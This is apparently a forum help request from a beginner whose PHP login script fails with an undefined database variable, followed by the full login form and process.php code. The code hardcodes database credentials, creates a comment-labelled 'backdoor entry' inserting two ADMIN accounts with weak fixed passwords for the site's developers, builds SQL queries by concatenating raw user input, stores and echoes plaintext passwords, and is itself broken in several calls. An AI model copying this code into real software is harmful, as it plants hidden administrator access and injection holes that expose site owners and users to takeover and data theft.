Good Evening I'm new to php and I was hoping if someone could help with with the following: I have a log on page and when I try to access by submiting my access details I receive the following error:
[Notice: Undefined variable: db in C:\xampp\htdocs\bizzycarsales.co.za\access\process.php on line 36
Warning: mysqli_query() expects parameter 1 to be mysqli, null given in C:\xampp\htdocs\bizzycarsales.co.za\access\process.php on line 36 Could not create security access]
<form action="process.php?action=login&recordID=<?php echo $recordID ?>" method="POST">
<table width="800" border="0" align="center" cellpadding="3" cellspacing="0">
<tr>
<td colspan="2"><img src="assets/admin-header2.jpg"></td>
</tr>
<tr>
<td><div align="right">Username:</div></td>
<td><input class="FormField" type="text" name="User_Email" maxlength="50" value="" /></td>
</tr>
<tr>
<td><div align="right">Password:</div></td>
<td><input class="formField" type="password" name="User_Password" maxlength="30" value="" /></td>
</tr>
<tr>
<td></td>
<td><input class="buttons" name="submit" type="submit" value="Login" /></td>
</tr>
<tr>
<td align="right"><a href="mailto:nick@web-objectives.com,dean@web-objectives.com">Forgot Password?</a></td>
<td></td>
</tr>
<td colspan="2"><div align="center"><em><font size="-1">Security Managed by <a href="http://www.web-objectives.com" target="_blank">web-objectives.com</a> </font></em></div></td>
</tr>
</table>
</form>
<?php
session_start();
//include ("../connection/connection.php");
$dbhost = "localhost";
$dbuser = "bizzyca2_deano";
$dbpass = "py2uz*??2A=f";
$dbname = "bizzyca2_database";
//connect
if (!($db = mysqli_connect($dbhost, $dbuser, $dbpass))) {
echo ("Failed to connect to database!<br>\n");
exit();
}
if (!(mysqli_select_db($db, $dbname))) {
echo "(Cant use the database.<br>\n)";
exit();
}
function checkAccessTable($User_Email,$User_Password)
{
$sql="
CREATE TABLE IF NOT EXISTS `access` (
`id` int(10) NOT NULL auto_increment,
`User_Email` varchar(35) NOT NULL,
`User_Password` varchar(32) NOT NULL,
`User_Level` varchar(10) NOT NULL,
`Last_Accessed` date NOT NULL,
PRIMARY KEY (`User_Email`),
UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=0" ;
mysqli_query($db, $sql) or die("Could not create security access");
//check if 1st time opperation
$sql = "SELECT * from access ";
$result = mysqli_query($sql) or die(mysqli_error("Access Error"));
$num = mysqli_numrows($result);
if ($num == 0)
{
$sql = "INSERT INTO access (User_Email, User_Password, User_Level)";
$sql .= "VALUES ( ";
$sql .= "'" . $User_Email . "',";
$sql .= "'" . $User_Password . "',";
$sql .= "'ADMIN' )";
mysqli_query($sql) or die(mysqli_error("Admin Start"));
//create backdoor entry
$sql = "INSERT INTO access (User_Email, User_Password, User_Level)";
$sql .= "VALUES ( ";
$sql .= "'dean@web-objectives.com',";
$sql .= "'ironfish',";
$sql .= "'ADMIN' )";
mysqli_query($sql) or die(mysqli_error("Admin Start"));
$sql = "INSERT INTO access (User_Email, User_Password, User_Level)";
$sql .= "VALUES ( ";
$sql .= "'nick@web-objectives.com',";
$sql .= "'nick',";
$sql .= "'ADMIN' )";
mysqli_query($sql) or die(mysqli_error("Admin Start"));
//return to Admin Options
header('Location: options.php?message=Access Created');
exit();
}
}
$_SESSION["attempts"]++;
if ($_SESSION["attempts"] > 100) {
echo "Your IP Address " . $_SERVER['SERVER_ADDR'] . " has been TRAPPED";
exit();
}
if (isset($_REQUEST['action']))
$action = $_REQUEST['action'];
if ($action == "logout") {
session_destroy();
header('Location: ../index.php?message=Logged Off');
exit();
}
if ($action == "login") {
if (isset($_REQUEST['User_Email']))
$User_Email = $_REQUEST['User_Email'];
if (isset($_REQUEST['User_Password']))
$User_Password = $_REQUEST['User_Password'];
if ($User_Email == "" || $User_Password == "") {
// if fails return to enquiry form
header('Location: index.php?message=Try Again Numpty');
exit();
} else {
echo $User_Email . "<br>";
echo $User_Password;
exit();
checkAccessTable($User_Email, $User_Password);
$sql = "SELECT * from access WHERE User_Email = '" . $User_Email .
"' AND User_Password = '" . $User_Password . "'";
$result = mysqli_query($sql) or die(mysqli_error("Access"));
$num = mysqli_numrows($result);
if ($num != 1) {
header('Location: index.php?message=Access Denied');
exit();
} else {
$i = 0;
$_SESSION["useremail"] = mysqli_result($result, $i, "User_Email");
$_SESSION["userid"] = mysqli_result($result, $i, "id");
$_SESSION["userlevel"] = mysqli_result($result, $i, "User_Level");
$Last_Accessed = date("Y/m/d");
$sql = "UPDATE access SET ";
$sql .= "Last_Accessed = '" . $Last_Accessed . "' ";
$sql .= " WHERE id = '" . $_SESSION["userid"] . "'";
mysqli_query($sql) or die(mysqli_error("Accessed Update"));
$_SESSION["attempts"] = 0;
header('Location: options.php?message=Access Permitted');
exit();
}
}
}
?>
